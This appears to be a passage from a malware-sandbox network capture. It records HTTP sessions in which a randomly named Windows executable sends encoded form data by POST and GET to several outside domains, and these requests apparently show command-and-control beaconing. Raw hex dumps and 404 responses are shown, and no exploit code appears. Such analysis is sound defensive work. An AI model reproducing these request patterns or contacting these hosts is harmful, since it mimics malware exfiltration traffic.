c0 6f bf 93 1a 84 b4 f7 c5 d9 ed e3 37 38 8c 6c db b6 fd fa 8d 1c 85 0d de 7f 8a 8b b3 cf cf [TRUNCATED]
                                                                            Data Ascii: 3720UWG!^0\zTXz{~{2Cgi2-;?,W1Q==@}Aitg.o1q{~Iv<(7U_U5e+C E7`p)'->!RPgOi\jdTgL;c*t)kFxy\?=W`/`[x)/67EA2`+!rX\I/^LdCNb8Io78lw^2gD1bAxV:6b7/g_[zYpoo/&7uP"M_*w`'K(%s-?EOZ&H~;}}|@Jfo|E9V9*\pV_3~79do#+7oon:@M86?Nn}=pe7YXB2Gr]9>Nw?pfcqov D{bVBH8MC2&2S\~W|oO 9lQR|@1azCTnkj&KS`_@,JjOhed&y:7yyiINhYU_G~6`aa/e0SAti|$uy
                                                                            Jun 19, 2024 22:41:15.718877077 CEST1236INData Raw: 0e 5f 12 82 a3 d0 99 8c cf 43 95 b8 7d b8 f0 6f d9 d2 6b c4 18 5d b7 b8 32 40 26 52 58 39 69 5d c2 5f a9 d4 c1 e1 67 03 49 e6 6f 9d ad f9 b8 25 93 d9 bf c4 f1 b3 56 d6 87 6f 7f 45 69 3d 53 0a 69 8c 72 58 1e 7b 2a db 55 1b 17 f7 09 25 90 8e 3c 93
                                                                            Data Ascii: _C}ok]2@&RX9i]_gIo%VoEi=SirX{*U%<RZ\PcU4>a<\$&9:R^_-Xmew}Zo:keI66X2"rcV-K3x<k7oS-kl7gWT
                                                                            Jun 19, 2024 22:41:15.718902111 CEST1236INData Raw: cf d8 46 5c 02 d1 30 72 cb d5 bd ca f5 95 06 99 08 ec 95 2e d5 34 fe ed c5 a2 a0 52 e7 2b b3 b7 bd 6c 75 49 97 93 0f e7 12 b8 ed 51 25 31 d5 f1 91 32 60 54 52 0b f9 ce 5b d4 8e 18 25 53 b3 d6 5c b0 6c fc 35 c0 d4 31 c8 31 4c fb 5b 5e 19 c0 d4 f4
                                                                            Data Ascii: F\0r.4R+luIQ%12`TR[%S\l511L[^:zl5Iu^3I-$}j4~6d;RE0`yHO*L_kc`VTv3U*Mb4P~2QB)xQd1T#q\AUJa22
                                                                            Jun 19, 2024 22:41:15.719018936 CEST592INData Raw: 4c fa 4f f3 25 b5 76 6b 4a fc ca fc dd dd d3 78 2d fa 57 cc 48 0d dd 57 f7 7a b7 fa cb 6a 91 13 de 7d 81 8c 19 df b5 cc f7 dc 97 d5 d8 a6 fc 6b b8 38 96 35 e3 36 cc bb d5 af e4 ed cd 7d 35 ef f6 2b 11 9c c3 d6 3b 30 76 fc c7 4a eb 9f 23 c7 79 09
                                                                            Data Ascii: LO%vkJx-WHWzj}k856}5+;0vJ#y0;As<q;n~Asj]u:,{d4jQo??;~.{/D&f6}t_`vUiU7B04nGY$c'#ZkN
                                                                            Jun 19, 2024 22:41:15.719041109 CEST1236INData Raw: 19 25 3b 5d 30 d0 29 96 34 10 8b 9a 60 3f 4a 75 e7 30 9d 42 e1 f8 7e 24 be 57 f9 93 ac 7f 41 b9 57 8e 5b aa 9a f6 c0 13 7e 85 81 aa 0c d0 53 a0 4b 42 03 4d f4 0c a8 05 0d 34 d0 44 cf 80 14 d8 a1 1d 85 f5 a2 f6 e5 0c b0 5a d1 86 c2 62 49 fb ba 57
                                                                            Data Ascii: %;]0)4`?Ju0B~$WAW[~SKBM4DZbIWD%x4@Ph)C;EN"/;P;R??i,5h"[O.2d$D0Jv`S,i 5P8NRZC9OmMX8aIDD2CD=@
                                                                            Jun 19, 2024 22:41:15.719068050 CEST1236INData Raw: 41 35 01 07 24 c7 44 18 90 03 44 07 83 16 f5 80 3c f4 4f 06 75 de 67 74 79 9f 12 4f e9 ca ff cd 2e e0 7e ba f2 e2 bf c3 be 96 ef c1 72 09 8e bf 5e 64 5f 90 e3 1f be c6 74 f9 79 80 f5 5e 2f 35 8b c1 a0 81 90 ac 96 b5 bf ec e2 0c b0 16 e8 00 8b 25
                                                                            Data Ascii: A5$DD<OugtyO.~r^d_ty^/5%{iX@r/<Dj-h2~2C%8bIbPM@ 9&XZ!B[l<Zh[}mztIh;^0[u1VZbgdb
                                                                            Jun 19, 2024 22:41:15.719101906 CEST1236INData Raw: 4a 44 44 24 fa 4c 14 08 12 86 e8 01 e4 8b 1a a8 10 22 64 65 7b 21 e8 00 24 4b da 2f 11 e6 ae bb b1 79 cd 78 db d3 57 66 bb bd d6 11 f4 80 2e 88 fe 59 e3 f2 7c 46 fd 0d f5 53 d3 6f 5f af 7c c1 1e 9c f9 ca 3d 4e 5d 4a f7 a8 7a 92 e4 7a f0 e7 25 fe
                                                                            Data Ascii: JDD$L"de{!$K/yxWf.Y|FSo_|=N]Jzz%k=1S`!}+0\h.o A4{ioxuWW)g=\WG<?<21Y`qTr@$@wKDrk~HG`9>|2=j_[q=O{8F!
                                                                            Jun 19, 2024 22:41:15.719125986 CEST1236INData Raw: 22 22 d1 33 21 25 02 6d 01 2b 46 0d c8 9d 15 85 ed 13 ed 6e ae 18 2d 44 25 9c 61 0f b0 8b 68 a1 5b 3f 6a 20 27 cc b0 5b 4f c0 2e c9 32 11 12 64 17 01 bb 24 cb 44 42 90 5d 40 07 dd 72 49 fb f1 e8 2d 10 a1 b7 39 64 f4 2e 88 d9 53 01 49 e7 d8 2c 49
                                                                            Data Ascii: ""3!%m+Fn-D%ah[?j '[O.2d$DB]@rI-9d.SI,I'!<5%dg0$4&zbb40HJ>d/ZO_,I9E,)"=R"b8HE]Xa0EOaZOd)\GU}q]mkl$}'E!z&K
                                                                            Jun 19, 2024 22:41:15.719146013 CEST1236INData Raw: 1a 48 8b 45 cb 76 7f e1 37 ad 26 5a 48 23 6a a0 b9 dc 56 e1 70 53 86 b4 87 e1 ae 8c ac 81 fe 72 8a c3 92 d2 1e 86 91 35 d0 62 a8 87 88 38 24 79 46 ba 4c 39 a0 e9 25 19 44 f6 4c 34 9a 72 88 08 c3 8c 96 89 5e 53 0e 81 b6 30 8c a8 81 76 73 4a 0d cb
                                                                            Data Ascii: HEv7&ZH#jVpSr5b8$yFL9%DL4r^S0vsJI;s5t<S7sl27dM,ITn.SKH<:-YXRPWX,EW8y^v@YMcS}pYR@ML"%#{3Z8Y
                                                                            Jun 19, 2024 22:41:15.719172955 CEST1236INData Raw: 3e 70 e1 70 90 e4 18 90 02 a8 0f bc 5f af a3 c1 5a c9 b0 af be 2f 02 9f 78 df fb 80 03 a2 6f 8d 90 3d 75 48 a4 35 36 4b 92 1c 15 0d 9f fc c9 53 07 46 ff 08 59 fb 87 46 4f 61 74 49 3e ff 86 c3 a3 89 9e 81 03 a4 c5 68 38 0a 1a 0e 92 26 7a 06 0e 93
                                                                            Data Ascii: >pp_Z/xo=uH56KSFYFOatI>h8&zdC+F,z@xAa=Li#d)bI)hX1j@^K{kg"V-V""2qo%""-V"`t|so/q=%=`d)JDD$z&%""=
                                                                            Jun 19, 2024 22:41:15.724261045 CEST1236INData Raw: 97 73 1b 52 b8 31 96 4c 11 a4 9e a0 3d 0c 57 74 5b 52 b8 2f 96 6c 53 92 6e e3 e7 c2 d3 68 0f 23 bb 9c dc 4a a1 dd 64 8a 20 7b aa 04 ed 61 a4 a4 5b 29 f4 9b 48 10 04 46 23 b8 3c a9 34 9c 5e 92 e1 92 1a 41 60 dc 9e 34 fe 61 8d 93 c0 24 df 84 84 84
                                                                            Data Ascii: sR1L=Wt[R/lSnh#Jd {a[)HF#<4^A`4a$<)T9!$4t!!!C$)T:"$4tj\Pz5NS4$E<[~jxQvq=nzufbAxhE[$NO{^^f=\h


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            38192.168.2.44978235.214.235.206805740C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 19, 2024 22:41:17.565459967 CEST432OUTGET /4iea/?8FiTp=kJrtnVsPEnF0JV&tF1tk6=LPPTutp79E4NI/FSO4tKhhCSj88LXvNdsgpq5qffN1EY6wk4NmMiGrfPgNjCGewOe8/3zUEWliAlmzRgBncp+x+MZNm8bqFqjUBXzLeJ0h1+xCuEpOdbPDQ= HTTP/1.1
                                                                            Host: www.grecanici.com
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Jun 19, 2024 22:41:18.200786114 CEST1236INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Wed, 19 Jun 2024 20:41:18 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            X-Httpd: 1
                                                                            Host-Header: 6b7412fb82ca5edfd0917e3957f05d89
                                                                            X-Proxy-Cache: MISS
                                                                            X-Proxy-Cache-Info: 0 NC:000000 UP:
                                                                            Data Raw: 31 33 64 35 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 73 74 6f 72 65 2c 6d 61 78 2d 61 67 65 3d 30 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 [TRUNCATED]
                                                                            Data Ascii: 13d59<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="cache-control" content="no-store,max-age=0" /> <meta name="robots" content="noindex" /> <title>404 - Not found</title> <link href="https://fonts.googleapis.com/css?family=Open+Sans:400,700%7CRoboto:400,700" rel="stylesheet"><style> * { box-sizing: border-box; -moz-box-sizing: border-box; -webkit-tap-highlight-color: transparent; } body { margin: 0; padding: 0; height: 100%; -webkit-text-size-adjust: 100%; } .fit-wide { position: relative; overflow: hidden; max-width: 1240px; margin: 0 auto; padding-top: 60px; padding-bottom: 60px; padding-left: 20px; padding-right: 20px; } .background-wrap { position: rel
                                                                            Jun 19, 2024 22:41:18.200808048 CEST1236INData Raw: 61 74 69 76 65 3b 20 7d 0a 20 20 20 20 2e 62 61 63 6b 67 72 6f 75 6e 64 2d 77 72 61 70 2e 63 6c 6f 75 64 2d 62 6c 75 65 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 62 30 65 30 65 39 3b 20 7d 0a 20 20 20 20 2e 62 61 63 6b 67
                                                                            Data Ascii: ative; } .background-wrap.cloud-blue { background-color: #b0e0e9; } .background-wrap.white { background-color: #fff; } .title { position: relative; text-align: center; margin: 20px auto 10px; } .ti
                                                                            Jun 19, 2024 22:41:18.200848103 CEST1236INData Raw: 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 7d 0a 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 36 37 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 65 72 72 6f 72 2d 2d 62 67 5f 5f 63
                                                                            Data Ascii: in: 0 auto; } @media screen and (max-width: 767px) { .error--bg__cover { display: none; } .abstract-half-dot--circle { left: 0; } }</style></head><body> <div id="container"> <section class="error cont
                                                                            Jun 19, 2024 22:41:18.200865984 CEST1236INData Raw: 2c 30 2d 2e 32 36 31 2c 30 61 39 2e 39 33 33 2c 39 2e 39 33 33 2c 30 2c 30 2c 31 2d 36 2e 39 39 34 2d 33 2e 31 30 38 68 30 61 31 30 2c 31 30 2c 30 2c 31 2c 31 2c 37 2e 32 35 35 2c 33 2e 31 31 5a 6d 2d 2e 30 31 33 2d 31 38 61 38 2c 38 2c 30 2c 30
                                                                            Data Ascii: ,0-.261,0a9.933,9.933,0,0,1-6.994-3.108h0a10,10,0,1,1,7.255,3.11Zm-.013-18a8,8,0,0,0-5.793,13.511h0a8,8,0,1,0,6-13.509C750.134,449,750.063,449,749.994,449Z" fill="#226d7a"/><path d="M292.416,254.312a1.013,1.013,0,0,1-.417-.09L266.634,242.6a1,1
                                                                            Jun 19, 2024 22:41:18.200890064 CEST1236INData Raw: 32 32 5a 4d 31 30 37 2c 32 32 38 61 35 2c 35 2c 30 2c 31 2c 31 2d 35 2c 35 41 35 2e 30 30 36 2c 35 2e 30 30 36 2c 30 2c 30 2c 31 2c 31 30 37 2c 32 32 38 5a 22 20 66 69 6c 6c 3d 22 23 32 32 36 64 37 61 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 37 34
                                                                            Data Ascii: 22ZM107,228a5,5,0,1,1-5,5A5.006,5.006,0,0,1,107,228Z" fill="#226d7a"/><path d="M74.783,225.467l8.647,2.5a.989.989,0,0,0,.278.04,1,1,0,0,0,.276-1.962l-8.646-2.5a1,1,0,0,0-.555,1.922Z" fill="#226d7a"/><path d="M28.617,241.8a1,1,0,0,0,.7-.282l6.4
                                                                            Jun 19, 2024 22:41:18.200913906 CEST1236INData Raw: 2c 30 2d 2e 35 35 34 2c 31 2e 39 32 32 6c 38 2e 36 34 36 2c 32 2e 35 61 31 2c 31 2c 30 2c 30 2c 30 2c 2e 32 31 36 2e 30 33 31 2c 37 2c 37 2c 30 2c 31 2c 30 2c 31 31 2e 39 38 2d 33 2e 32 6c 36 2e 30 30 36 2d 35 2e 38 32 35 61 31 2c 31 2c 30 2c 31
                                                                            Data Ascii: ,0-.554,1.922l8.646,2.5a1,1,0,0,0,.216.031,7,7,0,1,0,11.98-3.2l6.006-5.825a1,1,0,1,0-1.392-1.435ZM81,334a5,5,0,1,1,5-5A5.006,5.006,0,0,1,81,334Z" fill="#226d7a"/><path d="M103.687,304.486l-6.461,6.266a1,1,0,0,0,1.393,1.436l6.461-6.266a1,1,0,0,
                                                                            Jun 19, 2024 22:41:18.200938940 CEST1236INData Raw: 33 2c 31 36 32 2e 37 37 33 61 31 2c 31 2c 30 2c 30 2c 30 2c 2e 39 35 31 2d 31 2e 33 31 31 6c 2d 32 2e 38 2d 38 2e 35 35 35 61 31 2c 31 2c 30 2c 30 2c 30 2d 31 2e 39 2e 36 32 31 6c 32 2e 38 2c 38 2e 35 35 35 41 31 2c 31 2c 30 2c 30 2c 30 2c 38 38
                                                                            Data Ascii: 3,162.773a1,1,0,0,0,.951-1.311l-2.8-8.555a1,1,0,0,0-1.9.621l2.8,8.555A1,1,0,0,0,886.983,162.773Z" fill="#226d7a"/><path d="M879.544,135.8a1,1,0,1,0-1.9.621l2.795,8.555a1,1,0,0,0,.951.69,1,1,0,0,0,.95-1.311Z" fill="#226d7a"/><path d="M904.543,1
                                                                            Jun 19, 2024 22:41:18.201262951 CEST1236INData Raw: 2c 31 2c 30 2c 31 2e 36 2d 31 2e 32 5a 22 20 66 69 6c 6c 3d 22 23 32 32 36 64 37 61 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 39 36 32 2e 36 2c 32 34 30 2e 38 41 31 2c 31 2c 30 2c 30 2c 30 2c 39 36 31 2c 32 34 32 6c 35 2e 34 2c 37 2e 32 41 31 2c 31
                                                                            Data Ascii: ,1,0,1.6-1.2Z" fill="#226d7a"/><path d="M962.6,240.8A1,1,0,0,0,961,242l5.4,7.2A1,1,0,0,0,968,248Z" fill="#226d7a"/><path d="M931.091,198.789a6.943,6.943,0,0,0,1.777-6.129l7.473-4.185a1,1,0,1,0-.977-1.745l-7.172,4.016a6.988,6.988,0,0,0-11.127-1
                                                                            Jun 19, 2024 22:41:18.201277971 CEST1236INData Raw: 20 64 3d 22 4d 39 38 32 2c 32 36 31 61 36 2e 39 34 31 2c 36 2e 39 34 31 2c 30 2c 30 2c 30 2d 33 2e 35 32 37 2e 39 36 34 4c 39 37 33 2e 34 2c 32 35 35 2e 32 61 31 2c 31 2c 30 2c 31 2c 30 2d 31 2e 36 2c 31 2e 32 6c 35 2e 31 30 39 2c 36 2e 38 31 32
                                                                            Data Ascii: d="M982,261a6.941,6.941,0,0,0-3.527.964L973.4,255.2a1,1,0,1,0-1.6,1.2l5.109,6.812A6.99,6.99,0,1,0,982,261Zm0,12a5,5,0,1,1,5-5A5.006,5.006,0,0,1,982,273Z" fill="#226d7a"/><path d="M19,32H11V24a1,1,0,0,0-2,0v8H1a1,1,0,0,0,0,2H9v8a1,1,0,0,0,2,0V
                                                                            Jun 19, 2024 22:41:18.201306105 CEST1236INData Raw: 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 34 35 2e 37 34 32 20 39 38 2e 34 32 39 20 31 34 37 2e 35 38 31 20 39 36 2e 33 31 36 20 31 34 35 2e 37 34 32 20 39 34 2e 32 30 32 20 31 34 33 2e 39 30 34 20 39 36 2e 33 31 36 20 31 34 35 2e 37
                                                                            Data Ascii: <polygon points="145.742 98.429 147.581 96.316 145.742 94.202 143.904 96.316 145.742 98.429" fill="#fff"/><polygon points="145.742 86.624 147.581 84.51 145.742 82.396 143.904 84.51 145.742 86.624" fill="#fff"/><polygon points="156.015 129.621
                                                                            Jun 19, 2024 22:41:18.208102942 CEST1236INData Raw: 20 38 34 2e 35 31 20 31 36 36 2e 32 38 38 20 38 36 2e 36 32 34 20 31 36 38 2e 31 32 38 20 38 34 2e 35 31 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 37 36 2e 35 36 33 20 31 32 39 2e 36 32 31
                                                                            Data Ascii: 84.51 166.288 86.624 168.128 84.51" fill="#fff"/><polygon points="176.563 129.621 174.724 131.734 176.563 133.848 178.401 131.734 176.563 129.621" fill="#fff"/><polygon points="176.563 117.814 174.724 119.928 176.563 122.041 178.401 119.928 1


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            39192.168.2.449783202.95.21.152801860C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 19, 2024 22:41:30.198082924 CEST774OUTPOST /3in6/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US
                                                                            Host: www.qmancha.com
                                                                            Content-Length: 204
                                                                            Connection: close
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Origin: http://www.qmancha.com
                                                                            Referer: http://www.qmancha.com/3in6/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                            Data Raw: 67 68 65 50 31 44 58 3d 4d 63 41 59 47 4a 45 59 6a 78 5a 6d 59 31 6a 67 59 6b 76 78 69 55 45 6e 38 6e 42 55 2f 65 6b 58 54 50 2f 51 56 63 65 47 77 65 4d 47 57 74 70 63 45 6c 67 56 72 6c 51 59 4b 47 71 6d 32 6c 49 44 39 4c 4d 4a 61 64 67 70 6f 44 77 53 7a 63 78 43 66 4d 76 4e 51 59 55 4d 6d 72 72 69 33 51 61 4e 39 67 79 37 6d 35 62 78 49 41 62 70 41 46 64 58 2f 5a 5a 70 6c 61 52 30 42 7a 6c 77 38 52 4e 4f 32 77 6e 78 36 4f 36 7a 59 70 50 57 72 65 4a 51 39 49 49 50 64 70 57 6e 79 2f 45 67 64 54 71 31 32 79 30 48 4a 6f 71 56 67 77 35 69 58 63 6c 65 55 74 64 6f 4b 2b 6e 35 49 48 77 2f 32 45 34 35 50 77 3d 3d
                                                                            Data Ascii: gheP1DX=McAYGJEYjxZmY1jgYkvxiUEn8nBU/ekXTP/QVceGweMGWtpcElgVrlQYKGqm2lID9LMJadgpoDwSzcxCfMvNQYUMmrri3QaN9gy7m5bxIAbpAFdX/ZZplaR0Bzlw8RNO2wnx6O6zYpPWreJQ9IIPdpWny/EgdTq12y0HJoqVgw5iXcleUtdoK+n5IHw/2E45Pw==
                                                                            Jun 19, 2024 22:41:31.101912975 CEST190INHTTP/1.1 400 Bad Request
                                                                            Server: nginx
                                                                            Date: Wed, 19 Jun 2024 20:41:30 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: d404 Not Found0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            40192.168.2.44978418.178.206.118805740C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 19, 2024 22:41:31.772403002 CEST678OUTPOST /hcaw/ HTTP/1.1
                                                                            Host: www.93v0.com
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 203
                                                                            Origin: http://www.93v0.com
                                                                            Referer: http://www.93v0.com/hcaw/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Data Raw: 74 46 31 74 6b 36 3d 61 59 52 66 69 5a 70 71 69 6e 6b 42 33 75 42 44 65 74 77 74 76 68 52 70 78 72 53 67 58 33 4a 46 2f 56 75 67 4b 50 31 36 42 41 63 59 75 6f 69 43 6d 37 65 6d 4c 6b 68 5a 33 32 6c 61 50 34 6e 4b 31 50 47 6b 76 63 72 44 51 53 64 64 32 67 7a 68 6a 69 6e 49 6c 58 6e 57 30 4d 73 2b 74 79 4c 59 7a 4d 32 54 39 5a 72 4b 74 4a 74 74 36 66 41 33 43 44 2b 79 6a 44 55 36 5a 2b 2f 59 6f 61 57 56 4f 56 39 58 65 4d 33 32 71 48 66 47 66 47 34 37 65 74 61 54 4f 7a 4f 72 36 6e 7a 4c 4a 51 72 4c 76 33 43 64 71 4e 36 43 47 6a 46 36 45 37 71 68 39 69 57 56 71 39 6b 55 7a 48 30 57 43 2f 6e 44 79 41 3d 3d
                                                                            Data Ascii: tF1tk6=aYRfiZpqinkB3uBDetwtvhRpxrSgX3JF/VugKP16BAcYuoiCm7emLkhZ32laP4nK1PGkvcrDQSdd2gzhjinIlXnW0Ms+tyLYzM2T9ZrKtJtt6fA3CD+yjDU6Z+/YoaWVOV9XeM32qHfGfG47etaTOzOr6nzLJQrLv3CdqN6CGjF6E7qh9iWVq9kUzH0WC/nDyA==
                                                                            Jun 19, 2024 22:41:32.572886944 CEST367INHTTP/1.1 404 Not Found
                                                                            Date: Wed, 19 Jun 2024 20:41:32 GMT
                                                                            Server: Apache
                                                                            Content-Length: 203
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 63 61 77 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hcaw/ was not found on this server.</p></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            41192.168.2.449785202.95.21.152801860C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 19, 2024 22:41:32.734376907 CEST794OUTPOST /3in6/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US
                                                                            Host: www.qmancha.com
                                                                            Content-Length: 224
                                                                            Connection: close
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Origin: http://www.qmancha.com
                                                                            Referer: http://www.qmancha.com/3in6/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                            Data Raw: 67 68 65 50 31 44 58 3d 4d 63 41 59 47 4a 45 59 6a 78 5a 6d 58 31 54 67 5a 48 33 78 71 55 45 6b 7a 48 42 55 31 2b 6b 4c 54 50 44 51 56 5a 6d 57 77 74 6f 47 54 39 5a 63 48 68 30 56 71 6c 51 59 43 6d 71 70 38 46 49 32 39 4c 49 33 61 63 63 70 6f 43 51 53 7a 64 42 43 66 2f 48 4d 52 49 55 4f 75 4c 71 6b 6f 41 61 4e 39 67 79 37 6d 34 2f 62 49 41 44 70 41 31 74 58 39 39 4e 75 6d 61 52 31 47 7a 6c 77 32 78 4d 6d 32 77 6e 70 36 4c 6a 59 59 72 48 57 72 66 35 51 2b 64 6b 4d 45 5a 57 74 2f 66 46 2b 63 52 4c 43 73 58 49 4c 4b 6f 32 46 6a 7a 56 62 57 61 30 45 46 63 38 2f 59 2b 44 4b 56 41 35 4c 37 48 46 77 55 34 51 75 41 52 2f 31 39 30 72 4f 76 79 34 59 54 42 7a 34 75 57 34 3d
                                                                            Data Ascii: gheP1DX=McAYGJEYjxZmX1TgZH3xqUEkzHBU1+kLTPDQVZmWwtoGT9ZcHh0VqlQYCmqp8FI29LI3accpoCQSzdBCf/HMRIUOuLqkoAaN9gy7m4/bIADpA1tX99NumaR1Gzlw2xMm2wnp6LjYYrHWrf5Q+dkMEZWt/fF+cRLCsXILKo2FjzVbWa0EFc8/Y+DKVA5L7HFwU4QuAR/190rOvy4YTBz4uW4=
                                                                            Jun 19, 2024 22:41:33.761301041 CEST190INHTTP/1.1 400 Bad Request
                                                                            Server: nginx
                                                                            Date: Wed, 19 Jun 2024 20:41:33 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: d404 Not Found0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            42192.168.2.44978618.178.206.118805740C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 19, 2024 22:41:34.315742970 CEST698OUTPOST /hcaw/ HTTP/1.1
                                                                            Host: www.93v0.com
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
